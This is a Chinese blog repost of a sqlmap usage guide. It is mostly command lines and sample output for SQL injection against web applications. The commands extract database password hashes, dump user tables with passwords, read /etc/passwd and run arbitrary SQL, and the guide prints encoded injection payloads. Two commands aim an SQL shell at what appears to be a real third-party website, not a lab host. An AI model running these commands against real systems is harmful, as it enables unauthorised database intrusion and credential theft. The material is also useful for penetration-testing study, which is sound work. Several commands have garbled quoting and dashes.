当前位置:   article > 正文

sqlmap简单中文说明

unescaped numeric

Sqlmap是一款开源的命令行自动SQL注入工具。它由Bernardo Damele A.G.和Daniele Bellucci以GNU GPLv2许可证方式发布,可从http://sqlmap.sourceforge.net上下载。

Sqlmap不仅是一款利用工具,它还可以帮助我们寻找易受攻击的注入点。一旦检测到目标主机上的一个或多个SQL注入后,我们便可以从下列选项中选择一种进行操作:

执行扩展的后台DBMS跟踪。

检索DBMS的会话用户和数据库。

枚举用户、哈希口令、权限和数据库。

转储整个DBMS的表/列或者用户指定的DBMS的表/列。

运行自定义的SQL语句。

读取任意文件及更多内容。

Sqlmap用Python开发而成,这使得它能够独立于底层的操作系统,而只需2.4或之后版本的Python解释器即可。为了使事情更容易,许多GNU/Linux在发布时都创新性地附带安装了Python解释器包。Windows、UNIX和Mac OS X也均有提供或者可免费获取。Sqlmap是一款命令行工具,不过在本书写作期间,据说其GUI版本正处于开发中。Sqlmap实现了三种SQL注入漏洞利用技术:

UNION查询SQL注入,不管应用在单个响应中返回所有行还是一次只返回一行。

支持堆迭查询。

推理SQL注入。该工具通过比较每个HTTP响应和HTML页面内容的哈希,或者通过与原始请求进行字符串匹配来逐字符确定语句的输出值。Sqlmap为执行该技术而实现的平分算法最多可使用7个HTTP请求来提取每个输出字符。这是Sqlmap默认的SQL注入技术。

Sqlmap是一款功能强大且很灵活的工具,它目前支持下列数据库:

MySQL

Oracle

PostgreSQL

Microsoft SQL Server

就输入而言,sqlmap接收单个目标URL、来自Burp或WebScarab日志文件的目标列表或者一个"Google dork"(它可以查询Google搜索引擎并解析其结果页面)。Sqlmap可以自动测试客户端提供的所有GET/POST参数、HTTP cookie和HTTP用户代理头的值。此外,您可以重写这一行为并指定需要测试的参数。Sqlmap还支持多线程以便提高SQL盲注算法(多线程)的执行速度;可以根据请求执行的速度来估算完成攻击所需要的时间;可以保存当前对话以便以后继续检索。Sqlmap还集成了其他与安全相关的开源项目,比如 Metasploit和w3af。

Sqlmap示例

在第一个示例中,我们通过利用一个UNION查询SQL注入漏洞来检索Oracle XE 10.2.0.1 中SYS用户的口令哈希。我们通过命令行来提供必需的参数,sqlmap则还允许用户通过配置文件来指定这些选项。启动之后,sqlmap会告诉用户当前正在执行的动作及其结果。本例中,sqlmap首先测试id参数,之后尝试多种攻击因素并检查成功注入代码所需要的括号数。一旦成功构造了注入因素,sqlmap便会跟踪数据库并检测安装的Oracle。最后,Sqlmap关注SYS口令的哈希并将其返回给用户。但在此之前,它还会尝试跟踪远程操作系统和Web应用技术。
$ python sqlmap.py -u "http://www.victim.com
/get_int.php?id=1" --union-use --passwords -U SYS <snip> [hh:mm:50] [INFO] testing if User-Agent parameter
'User-Agent' is dynamic [hh:mm:51] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [hh:mm:51] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:51] [INFO] GET parameter 'id' is dynamic [hh:mm:51] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [hh:mm:51] [INFO] testing unescaped numeric
injection on GET parameter 'id' [hh:mm:51] [INFO] GET parameter 'id' is
unescaped numeric injectable with 0 parenthesis [hh:mm:51] [INFO] the injectable parameter
requires 0 parenthesis [hh:mm:51] [INFO] testing MySQL [hh:mm:51] [INFO] testing Oracle [hh:mm:51] [INFO] the back-end DBMD is Oracle web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: Oracle [hh:mm:51] [INFO] fetching database users password hashes [hh:mm:51] [INFO] query: UNION ALL SELECT NULL, CHR(86)||CHR(113)||CHR(70)||CHR(101)||CHR(81)
||CHR(77)||NVL(CAST(NAME AS VARCHAR(4000)), CHR(32)||CHR(122)||CHR(115)||CHR(109)||CHR(75)||CHR(104)||NVL(CAST (PASSWORD AD VARCHAR(4000)), CHR(32)||CHR(103)||CHR(115)||CHR(83)||CHR(107)||CHR(112),NULL FROM SYS.USER$ WHERE NAME = CHR(83)||CHR(89)
||CHR(83)-- AND 76957695=7695 [hh:mm:51] [INFO] performed 3 queries in 0 seconds database management system users password hashes: [*] SYS [1]: password hash: 2D5A0C491B634F1B

在介绍另一个工具之前,这里还有一个例子:使用Sqlmap转储PostgreSQL 8.3.5中当前数据库的users表。我们再次利用了UNION查询SQL注入漏洞,但这次使用的是-v 0选项,以最大程度地减少冗余长度:
$ python sqlmap.py -u "http://ww.victim.com/get_int.php?id=1"--union-use -
dump -T users -D public -v 0
<sinp>
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
+----+------------ +----------+
| id | password | username |
+----+------------ +----------+
| 1 | blissett | luther |
| 2 | nameisnull | NULL |
| 3 | bunny | fluffy |
| 4 | ming | wu |

=======================================

这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1″

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1

使用referer欺骗
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”

使用基本认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1″ –auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:3128″
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:8118″

使用多线程猜解
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 1 -p “id
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2″ -v 1 -p “cat,id”
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”

* Linux
* Windows

自定义payload
Options: –prefix and –postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET['id'] . “‘) LIMIT 0, 1″;:

$ python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1″ -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’='test”

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1′) AND 7433=7433 AND (‘test’='test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –regexp “<td>lu[\w][\w]er” -v

排除网站的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –excl-reg “Dynamic content: ([\d]+)”

多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –stacked-test -v 1

union注入测试
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –union-test -v 1

unionz注入配合orderby
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1″ –union-test –union-tech orderby -v 1

python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 –union-use –banner
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 5 –union-use –current-user
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1″ -v 1 –union-use –dbs

fingerprint
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –is-dba -v 1

列举数据库用户
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –users -v 0

列举数据库用户密码
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –passwords -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –passwords -U sa -v 0

查看用户权限
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –privileges -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –privileges -U postgres -v 0

列数据库
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dump -T users -D master -C surname -v 0

指定列的范围从2-4
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库,所有表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –dump-all -v 0

只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dump-all –exclude-sysdbs -v 0

sql query
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢复会话
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -b -v 1 -s “sqlmap.log”

保存选项到INC配置文件
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -b -v 1 –save

=====================================================


2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度
3、
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" -v 1

[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0

4、指定参数注入

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
-p "id"

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]

Or if you want to provide more than one parameter, for instance:

$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v
1 -p "cat,id"

5、指定方法和post的数据
python sqlmap.py -u "
http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"

6、指定cookie,可以注入一些需要登录的地址
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"

7、通过代理注入
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --proxy
"
http://127.0.0.1:8118"
8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。
--remote-dbms
10、指纹判别数据库类型
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、获取banner信息
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" -b

banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --
current-db

current database: 'testdb'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users

database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs

available databases [3]:
[*] information_schema
[*] mysql
[*] testdb

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables
-D "information_schema"

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
columns -T "user" -D "mysql"

Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+

13、显示指定的文件内容,一般用于php
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd

/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---

14、执行你自己的sql语句。

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"

[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'

15、union注入
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" --union-
check

valid union: 'http://192.168.1.47/page.php?id=1UNION ALL SELECT
NULL, NULL, NULL--&cat=2'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
union-use --banner

[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request:
http://192.168.1.47/page.php?id=1UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。
python sqlmap.py -u "
http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"

[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
banner -o "sqlmap.log" --resume

[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/786563
推荐阅读
相关标签
  

闽ICP备14008679号